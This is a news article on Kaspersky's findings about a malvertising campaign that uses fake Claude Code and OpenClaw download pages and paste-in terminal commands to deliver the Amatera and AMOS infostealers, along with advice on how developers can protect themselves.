Campaign Overview

Kaspersky’s research reveals a coordinated malvertising effort aimed at individuals seeking AI‑assisted coding tools. Search queries for terms like “Claude Code download” and “OpenClaw download” trigger top‑of‑page ads that appear legitimate. Clicking these ads redirects users to sites that closely mimic the official pages of Anthropic’s Claude Code and OpenAI’s OpenClaw.

The counterfeit sites do not offer traditional installers. Instead, they provide command‑line snippets that users are instructed to paste into the Windows Command Prompt or macOS Terminal. This delivery method makes the malicious activity harder to detect, as it bypasses typical installer warnings.

Malware Payloads

Depending on the operating system, the malicious code installs a different infostealer. Windows victims receive Amatera, a malware family known for gathering data from user directories, web browsers, and cryptocurrency wallets. Amatera has been observed in prior campaigns that use ClickFix distribution techniques and operates under a Malware‑as‑a‑Service (MaaS) model.

macOS users are infected with AMOS, a long‑standing macOS‑oriented infostealer that has been employed in numerous attacks against Apple users. Both malware variants are designed to exfiltrate sensitive information without the victim’s knowledge.

Risks for Developers

Kaspersky’s cybersecurity expert Vladimir Gursky emphasizes that the campaign is especially dangerous because AI development tools like Claude Code and OpenClaw are widely adopted by hobbyists, automation enthusiasts, and professional developers in large organizations. "If infected, victims may unknowingly expose source code from active projects, confidential corporate data, authentication credentials, and private accounts," Gursky notes.

The theft of source code and credentials can lead to intellectual property loss, unauthorized access to corporate systems, and financial theft from compromised cryptocurrency wallets. Organizations that rely on AI‑assisted coding tools are therefore at heightened risk.

Protective Measures

Security professionals advise developers to verify the authenticity of download sources before executing any code. Using official repositories, checking digital signatures, and avoiding unsolicited ads can reduce exposure. Enterprises should educate their development teams about the threat and implement monitoring for unusual data exfiltration patterns.

By staying vigilant and adhering to best practices, developers can mitigate the risk posed by this sophisticated malvertising campaign.

Used: News Factory APP - news discovery and automation - ChatGPT for Business